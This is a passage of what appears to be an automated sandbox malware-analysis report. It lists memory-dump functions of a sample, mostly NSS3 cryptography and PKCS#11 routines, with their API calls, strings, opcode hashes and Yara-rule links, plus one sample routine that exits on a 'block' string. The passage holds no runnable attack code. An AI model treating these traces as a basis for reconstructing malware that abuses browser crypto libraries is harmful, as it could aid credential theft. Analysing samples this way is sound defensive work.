Part of subcall function 6CFE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CF88298,?,?,?,6CF7FCE5,?), ref: 6CFE07BF
Part of subcall function 6CFE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CFE07E6
Part of subcall function 6CFE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE081B
Part of subcall function 6CFE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CFE0825

PR_SetError.NSS3(FFFFE005,00000000,?,6CFF3817,00000000), ref: 6CFF4550
SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6CFF45B5
SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6CFF4709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6CFF4727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6CFF473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6CFF4801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6D0B2DA0,?,?,?,?,?,?,?,?,00000000), ref: 6CFF482E
PR_GetCurrentThread.NSS3 ref: 6CFF48F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6CFF4923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6CFF4937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6CFF494E
PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6CFF4963
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CFF4984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6CFF21C2,?,?,?), ref: 6CFF499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFF49B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6CFF49C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6CFF49DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFF49E9

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
String ID:
API String ID: 3698863438-0
Opcode ID: 842ce9baacf0a166c18f83d141e5ceee0ed89c803ffe8ca9bd503fe6dc93033b
Instruction ID: 8e43340276eaa76d1f88c99f8d3d07dab656e9cfbe4ce0585f3463f3154d68b4
Opcode Fuzzy Hash: 842ce9baacf0a166c18f83d141e5ceee0ed89c803ffe8ca9bd503fe6dc93033b
Instruction Fuzzy Hash: CBA109B6E01204A7FF109A65DE80BAE3B75EF0531CF184135EA25ABBB1E731D846C791

Function 6CFB4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CFB4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFB4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFB4D37

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFB4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CFB4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFB4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CFB4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CFB4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CFB4E20

Strings

(CK_INVALID_HANDLE), xrefs: 6CFB4D30, 6CFB4D83
C_GetObjectSize, xrefs: 6CFB4CEE
hSession = 0x%x, xrefs: 6CFB4D12, 6CFB4D22
hObject = 0x%x, xrefs: 6CFB4D65, 6CFB4D75
pulSize = 0x%p, xrefs: 6CFB4DB7
*pulSize = 0x%x, xrefs: 6CFB4E1B
nm, xrefs: 6CFB4DD4, 6CFB4DFF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nm
API String ID: 1003633598-3478457865
Opcode ID: e9088296b7b54fe3834e1d7ad3782dedba47999bee3f41b7b953cc8a0b8e35bb
Instruction ID: 656d041944006cf425d624113bceff4b298cac1245f1fd4e07f666e6696bca4a
Opcode Fuzzy Hash: e9088296b7b54fe3834e1d7ad3782dedba47999bee3f41b7b953cc8a0b8e35bb
Instruction Fuzzy Hash: 60412771504105AFEB14DF61DE88F6E3BB5EB5670DF098069FA08BB292DB30D944CB62

Function 6D04CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D04CC7B), ref: 6D04CD7A

Part of subcall function 6D04CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CFBC1A8,?), ref: 6D04CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D04CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D04CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6D04CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D04CD8E

Part of subcall function 6CF705C0: PR_EnterMonitor.NSS3 ref: 6CF705D1
Part of subcall function 6CF705C0: PR_ExitMonitor.NSS3 ref: 6CF705EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6D04CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D04CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D04CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D04CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6D04CE48

Strings

wship6.dll, xrefs: 6D04CDE3
getaddrinfo, xrefs: 6D04CD88, 6D04CDF9
ws2_32.dll, xrefs: 6D04CD75
getnameinfo, xrefs: 6D04CDB2, 6D04CE23
freeaddrinfo, xrefs: 6D04CD9F, 6D04CE10

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: da5b5a7b6b654a7b10bdad4c2aa2b280f61fdc8f4aef36097c8751717746965e
Instruction ID: 78e590c9ccc89ba9ea253f83db5444df250779bdca3f0e3abad6fbaf51881af3
Opcode Fuzzy Hash: da5b5a7b6b654a7b10bdad4c2aa2b280f61fdc8f4aef36097c8751717746965e
Instruction Fuzzy Hash: F311D6AAD15902A3F7115B763C00FBB39989B5210CF048139D80AD6741FB22C64CC3FB

Function 6CFC4540 Relevance: 25.8, APIs: 17, Instructions: 349COMMON

Download Yara Rule

APIs

PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6CFC4590
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC471C
TlsGetValue.KERNEL32 ref: 6CFC477C
EnterCriticalSection.KERNEL32(?), ref: 6CFC479A
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CFC484A
PK11_FreeSymKey.NSS3(?), ref: 6CFC4858
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC486A
PR_Unlock.NSS3(?), ref: 6CFC487E

Part of subcall function 6D02DD70: TlsGetValue.KERNEL32 ref: 6D02DD8C
Part of subcall function 6D02DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D02DDB4

PK11_FreeSymKey.NSS3(?), ref: 6CFC488C
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC489C
PK11_GetInternalSlot.NSS3 ref: 6CFC48B2
PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6CFA7F9D), ref: 6CFC48EC
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6CFC492A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC4949
PR_SetError.NSS3(00000000,00000000), ref: 6CFC4977
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC4987
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFC499B

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
String ID:
API String ID: 1673584487-0
Opcode ID: 8fc1d44f253b23d4e506ffa8e03c112b66f5612f1527e5e487dc9a89c48e8df8
Instruction ID: 7a1c09fbdd2350cd222aa7c70d6b3c91c4c83412162cd3992103f1dd8e5adf5d
Opcode Fuzzy Hash: 8fc1d44f253b23d4e506ffa8e03c112b66f5612f1527e5e487dc9a89c48e8df8
Instruction Fuzzy Hash: 48E18F71E0026A9FDB20CF14CC44BAEBBB5EF44308F1481A9E81DA7751E7729A95CF91

Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00411A15
ExitProcess.KERNEL32 ref: 00411A21
strtok_s.MSVCRT ref: 00411A38

Strings

block, xrefs: 00411A07

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: e94d828ef2d45577c3d360740f7dd2d2fda6198eea1688a4677f194cd3c156fd
Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
Opcode Fuzzy Hash: e94d828ef2d45577c3d360740f7dd2d2fda6198eea1688a4677f194cd3c156fd
Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A

Function 6CFB6500 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_EncryptFinal), ref: 6CFB6526
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFB6554
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFB6563

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFB6579
PR_LogPrint.NSS3( pLastEncryptedPart = 0x%p,?), ref: 6CFB6595
PR_LogPrint.NSS3( pulLastEncryptedPartLen = 0x%p,?), ref: 6CFB65B0
PR_LogPrint.NSS3( *pulLastEncryptedPartLen = 0x%x,?), ref: 6CFB661A

Strings

C_EncryptFinal, xrefs: 6CFB6521
(CK_INVALID_HANDLE), xrefs: 6CFB655C
pulLastEncryptedPartLen = 0x%p, xrefs: 6CFB65AB
pLastEncryptedPart = 0x%p, xrefs: 6CFB6590
hSession = 0x%x, xrefs: 6CFB653E, 6CFB654E
*pulLastEncryptedPartLen = 0x%x, xrefs: 6CFB6615
nm, xrefs: 6CFB65C8, 6CFB65F6

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastEncryptedPartLen = 0x%x$ hSession = 0x%x$ pLastEncryptedPart = 0x%p$ pulLastEncryptedPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_EncryptFinal$nm
API String ID: 1003633598-744098942
Opcode ID: ee5356620156ca2ed620c1290114060fde8de744c74cda760d5bcf9dd6a29e76
Instruction ID: 2c9a9b702800345ea12c2526381728dedc61dffca8d0aa77a13d9939734d70ac
Opcode Fuzzy Hash: ee5356620156ca2ed620c1290114060fde8de744c74cda760d5bcf9dd6a29e76
Instruction Fuzzy Hash: B3312431905105EFEB18DF66DE88F5A37B5EB4670DF084064F908EB252DF318A54CBA1

Function 6CFE6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6D0B1DE0,?), ref: 6CFE6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFE6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CFE6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CFE6D82
DER_GetInteger_Util.NSS3(?), ref: 6CFE6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CFE6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CFE6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CFE6F19
PK11_DigestBegin.NSS3(00000000), ref: 6CFE6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CFE6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CFE7011
PK11_FreeSymKey.NSS3(00000000), ref: 6CFE7033
free.MOZGLUE(?), ref: 6CFE703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CFE7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CFE7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CFE70AF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 86c6f7d4377c9d973a4432a48acc3b1c024a0e3e52941702c58bfb14330a9b37
Instruction ID: 02c5e5cc0cb6a9a709241b7a9a666cba86d638d38591e5e5fcedbb6f1ce03bf5
Opcode Fuzzy Hash: 86c6f7d4377c9d973a4432a48acc3b1c024a0e3e52941702c58bfb14330a9b37
Instruction Fuzzy Hash: D9A1F67290824DBBEB108B24DC45BAB76A5DB8930CF244939FB18CBA81F775D8458793

Function 6CFC25D0 Relevance: 24.3, APIs: 16, Instructions: 284COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6CF9662E,?,?), ref: 6CFC264E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6CF9662E,?,?), ref: 6CFC2670
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6CF9662E,?), ref: 6CFC2684
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6CFC26C2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6CFC26E0
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6CFC26F4
PR_Unlock.NSS3(?), ref: 6CFC274D
PR_SetError.NSS3(00000000,00000000), ref: 6CFC28A9

Part of subcall function 6CFD3440: PK11_GetAllTokens.NSS3 ref: 6CFD3481
Part of subcall function 6CFD3440: PR_SetError.NSS3(00000000,00000000), ref: 6CFD34A3
Part of subcall function 6CFD3440: TlsGetValue.KERNEL32 ref: 6CFD352E
Part of subcall function 6CFD3440: EnterCriticalSection.KERNEL32(?), ref: 6CFD3542
Part of subcall function 6CFD3440: PR_Unlock.NSS3(?), ref: 6CFD355B

PR_Unlock.NSS3(?), ref: 6CFC27A1
PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6CF9662E,?,?,?), ref: 6CFC27B5
PR_Unlock.NSS3(?), ref: 6CFC27CE
TlsGetValue.KERNEL32 ref: 6CFC27E8
EnterCriticalSection.KERNEL32(0000001C), ref: 6CFC2800

Part of subcall function 6CFCF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CFCF854
Part of subcall function 6CFCF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CFCF868
Part of subcall function 6CFCF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CFCF882
Part of subcall function 6CFCF820: free.MOZGLUE(04C483FF,?,?), ref: 6CFCF889
Part of subcall function 6CFCF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CFCF8A4
Part of subcall function 6CFCF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CFCF8AB
Part of subcall function 6CFCF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CFCF8C9
Part of subcall function 6CFCF820: free.MOZGLUE(280F10EC,?,?), ref: 6CFCF8D0

PR_Unlock.NSS3(?), ref: 6CFC2834
TlsGetValue.KERNEL32 ref: 6CFC284E
EnterCriticalSection.KERNEL32(0000001C), ref: 6CFC2866

Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707AD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707CD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707D6
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF0204A), ref: 6CF707E4
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,6CF0204A), ref: 6CF70864
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF70880
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,6CF0204A), ref: 6CF708CB
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708D7
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708FB

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
String ID:
API String ID: 544520609-0
Opcode ID: 81b3ec29e1083b6d7df31c45d162d80b61de6a954fa50acf7647dbce375b600a
Instruction ID: 124d3b08129768682da632a24395222a24b07ead7366560499b775a97b943a72
Opcode Fuzzy Hash: 81b3ec29e1083b6d7df31c45d162d80b61de6a954fa50acf7647dbce375b600a
Instruction Fuzzy Hash: BEB1E671E00606DFEB00DF68D888B9BB7B4FF48304F545529E905A7B41EB32E950CBA2

Function 6CFAAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CF8AB95,00000000,?,00000000,00000000,00000000), ref: 6CFAAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CF8AB95,00000000,?,00000000,00000000,00000000), ref: 6CFAAF39
PR_Unlock.NSS3(?,?,?,6CF8AB95,00000000,?,00000000,00000000,00000000), ref: 6CFAAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CF8AB95,00000000,?,00000000,00000000,00000000), ref: 6CFAAF69
TlsGetValue.KERNEL32 ref: 6CFAB06B
EnterCriticalSection.KERNEL32(?), ref: 6CFAB083
PR_Unlock.NSS3(?), ref: 6CFAB0A4
TlsGetValue.KERNEL32 ref: 6CFAB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CFAB0D9
PR_Unlock.NSS3 ref: 6CFAB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFAB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFAB182

Part of subcall function 6CFDFAB0: free.MOZGLUE(?,-00000001,?,?,6CF7F673,00000000,00000000), ref: 6CFDFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CFAB177

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CF8AB95,00000000,?,00000000,00000000,00000000), ref: 6CFAB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CF8AB95,00000000,?,00000000,00000000,00000000), ref: 6CFAB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CF8AB95,00000000,?,00000000,00000000,00000000), ref: 6CFAB1C2

Part of subcall function 6CFD1560: TlsGetValue.KERNEL32(00000000,?,6CFA0844,?), ref: 6CFD157A
Part of subcall function 6CFD1560: EnterCriticalSection.KERNEL32(?,?,?,6CFA0844,?), ref: 6CFD158F
Part of subcall function 6CFD1560: PR_Unlock.NSS3(?,?,?,?,6CFA0844,?), ref: 6CFD15B2

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: da88ef7053d6c859c78a07c209e380804d392d81364defb3684865981dfd85fa
Instruction ID: 7fd646ed0ae5a1fdde6e0a2ce1f96c20980c0f8189a1a3d10136c39240774b9a
Opcode Fuzzy Hash: da88ef7053d6c859c78a07c209e380804d392d81364defb3684865981dfd85fa
Instruction Fuzzy Hash: 72A1A1B5D00209DBEF009FA4DC41BAEB7B4BF09308F154525E909A7651EB31E99ACBE1

Function 6CFCE550 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 384COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFCE5A0

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

memcpy.VCRUNTIME140(?,?,?), ref: 6CFCE5F2

Strings

0, xrefs: 6CFCEA4D

Memory Dump Source

